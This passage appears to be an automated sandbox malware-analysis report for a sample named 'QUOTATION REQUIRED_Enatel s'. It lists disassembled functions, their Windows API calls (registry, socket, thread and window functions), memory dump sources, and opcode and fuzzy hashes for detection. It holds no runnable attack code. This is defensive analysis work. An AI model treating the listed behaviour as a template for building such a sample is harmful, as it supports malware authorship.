                                                                                                                    • Instruction Fuzzy Hash: 9C2181759003059FDB60AF698C04ADA77E4BF95730F600B19F8A1E72E0EB709864EB60
                                                                                                                    Function 00FA40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F1600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F1604C
                                                                                                                      • Part of subcall function 00F1600E: GetStockObject.GDI32(00000011), ref: 00F16060
                                                                                                                      • Part of subcall function 00F1600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F1606A
                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FA4112
                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FA411F
                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FA412A
                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FA4139
                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FA4145
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                    • Opcode ID: 9e5b0a1fdf180173e39a896d508c0969572f959d7499a6e09146013cf46cfaee
                                                                                                                    • Instruction ID: 895205d9e7fbbd2e92883f2f41fd7d01433aa1b67796aa33a778855bfcc28f1d
                                                                                                                    • Opcode Fuzzy Hash: 9e5b0a1fdf180173e39a896d508c0969572f959d7499a6e09146013cf46cfaee
                                                                                                                    • Instruction Fuzzy Hash: 6D11B6B214021D7EEF119F64CC85EE77F5DEF09798F004111B618A6150C6B6DC61EBA4
                                                                                                                    Function 00F4D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F4D7A3: _free.LIBCMT ref: 00F4D7CC
                                                                                                                    • _free.LIBCMT ref: 00F4D82D
                                                                                                                      • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
                                                                                                                      • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
                                                                                                                    • _free.LIBCMT ref: 00F4D838
                                                                                                                    • _free.LIBCMT ref: 00F4D843
                                                                                                                    • _free.LIBCMT ref: 00F4D897
                                                                                                                    • _free.LIBCMT ref: 00F4D8A2
                                                                                                                    • _free.LIBCMT ref: 00F4D8AD
                                                                                                                    • _free.LIBCMT ref: 00F4D8B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                    • Instruction ID: c2909a71ada78281a0f80f7854627c584d8423ab15ff8480bd076dd8cf1df4d0
                                                                                                                    • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                    • Instruction Fuzzy Hash: 5A115171540B04ABE921BFB1CC47FCB7FEC6F00700F800825BA99A6192DA79B5057650
                                                                                                                    Function 00F7DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F7DA74
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00F7DA7B
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F7DA91
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00F7DA98
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F7DADC
                                                                                                                    Strings
                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00F7DAB9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                                    • Opcode ID: b3e7832dd6012b44e59a0f887ed4857bcbdbdaeca60a0c4f66373831c98ccf91
                                                                                                                    • Instruction ID: 3d0201e3f8efb4fad33883ca83e66263911079b8bfc4b112fb7f5c668a343bf7
                                                                                                                    • Opcode Fuzzy Hash: b3e7832dd6012b44e59a0f887ed4857bcbdbdaeca60a0c4f66373831c98ccf91
                                                                                                                    • Instruction Fuzzy Hash: 230162F290020C7FE710EBA4DD89EE7336CEB09701F404496B70AE2142EA749E845FB5
                                                                                                                    Function 00F8096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(0122E060,0122E060), ref: 00F8097B
                                                                                                                    • EnterCriticalSection.KERNEL32(0122E040,00000000), ref: 00F8098D
                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 00F8099B
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00F809A9
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F809B8
                                                                                                                    • InterlockedExchange.KERNEL32(0122E060,000001F6), ref: 00F809C8
                                                                                                                    • LeaveCriticalSection.KERNEL32(0122E040), ref: 00F809CF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3495660284-0
                                                                                                                    • Opcode ID: 227ac0994cfa4a1c7c8ac02b06f85888e619415d6c1b7f0fa541a1152cce9c0c
                                                                                                                    • Instruction ID: 7b0815a28f4c13e611be39d9c96f15d9414254b8f85e2663fdd0b1633ad73702
                                                                                                                    • Opcode Fuzzy Hash: 227ac0994cfa4a1c7c8ac02b06f85888e619415d6c1b7f0fa541a1152cce9c0c
                                                                                                                    • Instruction Fuzzy Hash: 29F03C72542A06BBD7415FA4EE8CBD6BB79FF02712F802025F202908A0CB749465EFD0
                                                                                                                    Function 00F91C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F91DC0
                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F91DE1
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F91DF2
                                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00F91EDB
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00F91E8C
                                                                                                                      • Part of subcall function 00F739E8: _strlen.LIBCMT ref: 00F739F2
                                                                                                                      • Part of subcall function 00F93224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00F8EC0C), ref: 00F93240
                                                                                                                    • _strlen.LIBCMT ref: 00F91F35
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3203458085-0
                                                                                                                    • Opcode ID: dcac46ed9ac8cac91769fad4aece017b8208e8b4da392df426a0a75617ed72d4
                                                                                                                    • Instruction ID: edd360433d6e3698726dd99f5049019d4c7aaa5a2608ee6e3f196843ff7ee40f
                                                                                                                    • Opcode Fuzzy Hash: dcac46ed9ac8cac91769fad4aece017b8208e8b4da392df426a0a75617ed72d4
                                                                                                                    • Instruction Fuzzy Hash: A0B11031604301AFEB24DF24C885E6A7BE5BF84328F54895CF4564B2E2CB35ED82DB91
                                                                                                                    Function 00F15D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00F15D30
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F15D71
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00F15D99
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00F15ED7
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F15EF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1296646539-0
                                                                                                                    • Opcode ID: c65e15aa072117ff13968e2d51aeeb3abca7413a8e29ced4e26df164e0654860
                                                                                                                    • Instruction ID: b545969d0123c489447b283d4d4fb09923b24e738cb1dd194c33f6300607c448
                                                                                                                    • Opcode Fuzzy Hash: c65e15aa072117ff13968e2d51aeeb3abca7413a8e29ced4e26df164e0654860
                                                                                                                    • Instruction Fuzzy Hash: 21B18A75A0074ADBDB10CFA8C4807EEB7F1FF48311F14841AE8A9D7250DB30AA91EB50
                                                                                                                    Function 00F401B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __allrem.LIBCMT ref: 00F400BA
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F400D6
                                                                                                                    • __allrem.LIBCMT ref: 00F400ED
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F4010B
                                                                                                                    • __allrem.LIBCMT ref: 00F40122
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F40140
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1992179935-0
                                                                                                                    • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                    • Instruction ID: 7e2bd05ecb64913b55a35ad82b24cf386577fb6227f30b852f0efdba654bc3bc
                                                                                                                    • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                    • Instruction Fuzzy Hash: 9D81E872E007069BE720AE79CC41B6B77E9AF91334F24463AFE51D7281EB74D904AB50
                                                                                                                    Function 00F461FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F382D9,00F382D9,?,?,?,00F4644F,00000001,00000001,8BE85006), ref: 00F46258
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F4644F,00000001,00000001,8BE85006,?,?,?), ref: 00F462DE
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F463D8
                                                                                                                    • __freea.LIBCMT ref: 00F463E5
                                                                                                                      • Part of subcall function 00F43820: RtlAllocateHeap.NTDLL(00000000,?,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6,?,00F11129), ref: 00F43852
                                                                                                                    • __freea.LIBCMT ref: 00F463EE
                                                                                                                    • __freea.LIBCMT ref: 00F46413
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0
                                                                                                                    • Opcode ID: f261f0dee18d8f6fb2ee07e254037117e7dafa467a943a2452ecfa3d9f033635
                                                                                                                    • Instruction ID: 62e4c7fd58796b37f728f7d9eb3edff43e03ac7fcb61a0101cdb1f341b888e1e
                                                                                                                    • Opcode Fuzzy Hash: f261f0dee18d8f6fb2ee07e254037117e7dafa467a943a2452ecfa3d9f033635
                                                                                                                    • Instruction Fuzzy Hash: E151F372A00256ABDF258F64CC81FBF7FA9EB46720F144269FC05D6280DB38DC40E6A1
                                                                                                                    Function 00F9BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F9C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9B6AE,?,?), ref: 00F9C9B5
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9C9F1
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA68
                                                                                                                      • Part of subcall function 00F9C998: _wcslen.LIBCMT ref: 00F9CA9E
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9BCCA
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9BD25
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F9BD6A
                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F9BD99
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F9BDF3
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F9BDFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1120388591-0
                                                                                                                    • Opcode ID: 6d07a31a7724cd658890f8c43a9be5e3a7596e64c0f52f5650b589dd7caeb93c
                                                                                                                    • Instruction ID: 4b0597721bc01af564a6bd63b21a7e90d7222365bb2ae337d1107c1ea0903e13
                                                                                                                    • Opcode Fuzzy Hash: 6d07a31a7724cd658890f8c43a9be5e3a7596e64c0f52f5650b589dd7caeb93c
                                                                                                                    • Instruction Fuzzy Hash: 8781DF70208241EFDB14DF24C985E6ABBE5FF85318F14885DF4598B2A2CB31ED45EB92
                                                                                                                    Function 00F6F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 00F6F7B9
                                                                                                                    • SysAllocString.OLEAUT32(00000001), ref: 00F6F860
                                                                                                                    • VariantCopy.OLEAUT32(00F6FA64,00000000), ref: 00F6F889
                                                                                                                    • VariantClear.OLEAUT32(00F6FA64), ref: 00F6F8AD
                                                                                                                    • VariantCopy.OLEAUT32(00F6FA64,00000000), ref: 00F6F8B1
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F6F8BB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859894641-0
                                                                                                                    • Opcode ID: 3c9a85d9a84a0bf2e144f3e3744421acc20824e800c8ef7f2dd7014ebbff2d7a
                                                                                                                    • Instruction ID: a8827071533c18a76eb5b6b7ac1efa0ca2a5493433d42f6742205a681652f9c0
                                                                                                                    • Opcode Fuzzy Hash: 3c9a85d9a84a0bf2e144f3e3744421acc20824e800c8ef7f2dd7014ebbff2d7a
                                                                                                                    • Instruction Fuzzy Hash: 2551F932A10310FADF10AB76EC95B69B3A8EF45310F244467E906DF291DB748C48F796
                                                                                                                    Function 00F8910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F17620: _wcslen.LIBCMT ref: 00F17625
                                                                                                                      • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00F894E5
                                                                                                                    • _wcslen.LIBCMT ref: 00F89506
                                                                                                                    • _wcslen.LIBCMT ref: 00F8952D
                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00F89585
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 83654149-3081909835
                                                                                                                    • Opcode ID: b94f245b7dbb3b9e5e7ca5f4a4dee6d8d0f2711c1ca204bbddd9266da829bbc8
                                                                                                                    • Instruction ID: 338c89efd7c887a110641956dff9d7a0fd343bf3416f470c41d00cc837ddd367
                                                                                                                    • Opcode Fuzzy Hash: b94f245b7dbb3b9e5e7ca5f4a4dee6d8d0f2711c1ca204bbddd9266da829bbc8
                                                                                                                    • Instruction Fuzzy Hash: 51E1B631908340CFC714EF24C881AAEB7E5BF85324F08856DF8999B2A2DB75ED45DB91
                                                                                                                    Function 00F2920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00F29241
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F292A5
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00F292C2
                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F292D3
                                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00F29321
                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F671EA
                                                                                                                      • Part of subcall function 00F29339: BeginPath.GDI32(00000000), ref: 00F29357
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3050599898-0
                                                                                                                    • Opcode ID: f8ac977f2f78d8005f6a66379ac76cf268455b289c5db4e08a0faa3e8edc7d2e
                                                                                                                    • Instruction ID: 62df9061860c9e73b1bcf6af418b11133908726784f5e4edab262e92933681bc
                                                                                                                    • Opcode Fuzzy Hash: f8ac977f2f78d8005f6a66379ac76cf268455b289c5db4e08a0faa3e8edc7d2e
